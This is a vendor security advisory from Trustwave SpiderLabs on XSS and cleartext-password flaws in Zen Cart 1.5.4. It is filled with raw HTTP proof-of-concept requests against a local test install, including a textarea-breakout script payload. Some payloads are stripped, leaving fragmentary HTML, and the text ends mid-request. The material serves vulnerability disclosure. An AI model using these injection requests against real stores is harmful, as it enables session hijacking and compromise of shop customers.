Trustwave SpiderLabs Security Advisory TWSL2016-006: Multiple Vulnerabilities in Zen Cart Published: 03/22/2016 Version: 1.0 Vendor: Zen Ventures, LLC (http://www.zen-cart.com/) Product: Zen Cart Version affected: 1.5.4 and prior versions Product description: Zen Cart is an online store management system. It is PHP-based, using a MySQL database and HTML components. Finding 1: Cross Site Scripting Vulnerability Credit: Michael Yuen of Trustwave SpiderLabs CWE: CWE-79 A cross-site scripting vulnerability is present in the Zen Cart payment information page (/index.php?main_page=checkout_payment) in the comments parameter. The vulnerability has been confirmed on Firefox 39. Submitting a comment with an invalid Redemption Code results in a reflection of the comments in an unfiltered textarea element. In addition, the XSS is persistent for the duration of the user's session. Example: POST /zen-cart-v1.5.4-12302014/index.php?main_page=checkout_confirmation HTTP/1.1 Host: localhost:88 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:88/zen-cart-v1.5.4-12302014/index.php?main_page=checkout_payment Cookie: zenid=6f6v1obdaip2ncvjol14d0cc90 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 182 securityToken=29c60cb39a8bbf22586bb300defbff58&action=submit&dc_redeem_code=abc&payment=moneyorder&comments=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=22&y=29 #Response for /index.php?main_page=checkout_payment <--------------snip-----------> Special Instructions or Order Comments <--------------snip-----------> Remediation Steps: The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. · Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form. · Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “<>. Finding 2: Cleartext Transmission of Sensitive Information involving the password in a failed login response Credit: Sriram Akurati of Trustwave SpiderLabs CWE: CWE-319 When attempting a login with an invalid password, the resulting response contains that invalid password. POST /zen-cart-v1.5.4-12302014/index.php?main_page=login&action=process HTTP/1.1 Host: localhost:88 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:88/zen-cart-v1.5.4-12302014/index.php?main_page=login&action=process Cookie: zenid=8p6tl9o6q875tskgvoohus2us3 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 153 securityToken=46b84fd35a8199018af4516a4e5e3ff7&email_address=foo%40bar.com&password=123456&securityToken=46b84fd35a8199018af4516a4e5e3ff7&x=0&y=0 #Response <--------------snip----------->
<--------------snip-----------> Finding 3: Cross Site Scripting Vulnerabilities Credit: Michael Yuen and Sriram Akurati of Trustwave SpiderLabs CWE: CWE-79 Various cross-site scripting vulnerabilities exist in the Zen Cart admin interface. Finding 3.1: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_description[2] Injection value: Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------31870220875781 Content-Length: 4875 -----------------------------31870220875781 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781 Content-Disposition: form-data; name="x" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="y" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="master_category" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------31870220875781 Content-Disposition: form-data; name="products_status" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------31870220875781 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------31870220875781 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[2]" -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[1]" test -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------31870220875781 Content-Disposition: form-data; name="products_model" testval -----------------------------31870220875781 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------31870220875781 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------31870220875781 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------31870220875781 Content-Disposition: form-data; name="image_delete" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="overwrite" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_weight" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781-- HTTP Response ----Truncated due to large size --- pes
admin admin $12.00
3ds/25
For more information, please visit this products webpage.
This product was added to our catalog on Tuesday 25 August, 2015.
Englishalert(14405309.14557) Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------31870220875781 Content-Length: 4883 -----------------------------31870220875781 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781 Content-Disposition: form-data; name="x" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="y" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="master_category" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------31870220875781 Content-Disposition: form-data; name="products_status" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------31870220875781 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------31870220875781 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[1]" -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------31870220875781 Content-Disposition: form-data; name="products_model" testval -----------------------------31870220875781 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------31870220875781 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------31870220875781 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------31870220875781 Content-Disposition: form-data; name="image_delete" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="overwrite" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_weight" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781-- HTTP Response ----Truncated due to large size --- " class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.
English admin $12.00
3ds/25
For more information, please visit this products webpage.
This product was added to our catalog on Tuesday 25 August, 2015.
Detection value: alert(14405309.14977) HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------31870220875781 Content-Length: 4886 -----------------------------31870220875781 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781 Content-Disposition: form-data; name="x" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="y" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="master_category" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------31870220875781 Content-Disposition: form-data; name="products_status" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------31870220875781 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------31870220875781 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[1]" test -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------31870220875781 Content-Disposition: form-data; name="products_model" testval -----------------------------31870220875781 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------31870220875781 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------31870220875781 Content-Disposition: form-data; name="img_dir" >"> -----------------------------31870220875781 Content-Disposition: form-data; name="image_delete" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="overwrite" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_weight" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781-- HTTP Response ----Truncated due to large size --- Manager
  • Media Types
  • admin admin $12.00
    25" border="0" alt=">">25" title=" >">25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.15017) HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------31870220875781 Content-Length: 4888 -----------------------------31870220875781 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781 Content-Disposition: form-data; name="x" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="y" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="master_category" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------31870220875781 Content-Disposition: form-data; name="products_status" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------31870220875781 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------31870220875781 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[1]" test -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------31870220875781 Content-Disposition: form-data; name="products_model" testval -----------------------------31870220875781 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------31870220875781 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------31870220875781 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------31870220875781 Content-Disposition: form-data; name="image_delete" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="overwrite" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_image_manual" >"> -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_weight" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781-- HTTP Response ----Truncated due to large size --- ger
  • Media Types
  • admin admin $12.00
    " border="0" alt="3ds/>">" title=" 3ds/>"> " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.15227) HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------31870220875781 Content-Length: 4870 -----------------------------31870220875781 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781 Content-Disposition: form-data; name="x" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="y" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="master_category" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------31870220875781 Content-Disposition: form-data; name="products_status" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------31870220875781 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------31870220875781 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[1]" test -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------31870220875781 Content-Disposition: form-data; name="products_model" testval -----------------------------31870220875781 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------31870220875781 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------31870220875781 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------31870220875781 Content-Disposition: form-data; name="image_delete" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="overwrite" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[2]" >"> -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_weight" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781-- HTTP Response ----Truncated due to large size --- h="100%" cellspacing="0" cellpadding="2">
    admin admin $12.00
    3ds/25Default text
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Finding 3.6: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_url[1] Injection value: >"> Detection value: alert(14405309.15247) HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------31870220875781 Content-Length: 4870 -----------------------------31870220875781 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781 Content-Disposition: form-data; name="x" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="y" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="master_category" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------31870220875781 Content-Disposition: form-data; name="products_status" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------31870220875781 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------31870220875781 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------31870220875781 Content-Disposition: form-data; name="products_description[1]" test -----------------------------31870220875781 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------31870220875781 Content-Disposition: form-data; name="products_model" testval -----------------------------31870220875781 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------31870220875781 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------31870220875781 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------31870220875781 Content-Disposition: form-data; name="image_delete" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="overwrite" 1 -----------------------------31870220875781 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------31870220875781 Content-Disposition: form-data; name="products_url[1]" >"> -----------------------------31870220875781 Content-Disposition: form-data; name="products_weight" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------31870220875781 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------31870220875781-- HTTP Response ----Truncated due to large size --- "100%" cellspacing="0" cellpadding="2">
    English admin $12.00
    English admin $12.00
    3ds/25test
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    alert(14405309.33337) Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------19864573418301 Content-Length: 4875 -----------------------------19864573418301 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301 Content-Disposition: form-data; name="x" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="y" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="master_category" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------19864573418301 Content-Disposition: form-data; name="products_status" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------19864573418301 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------19864573418301 Content-Disposition: form-data; 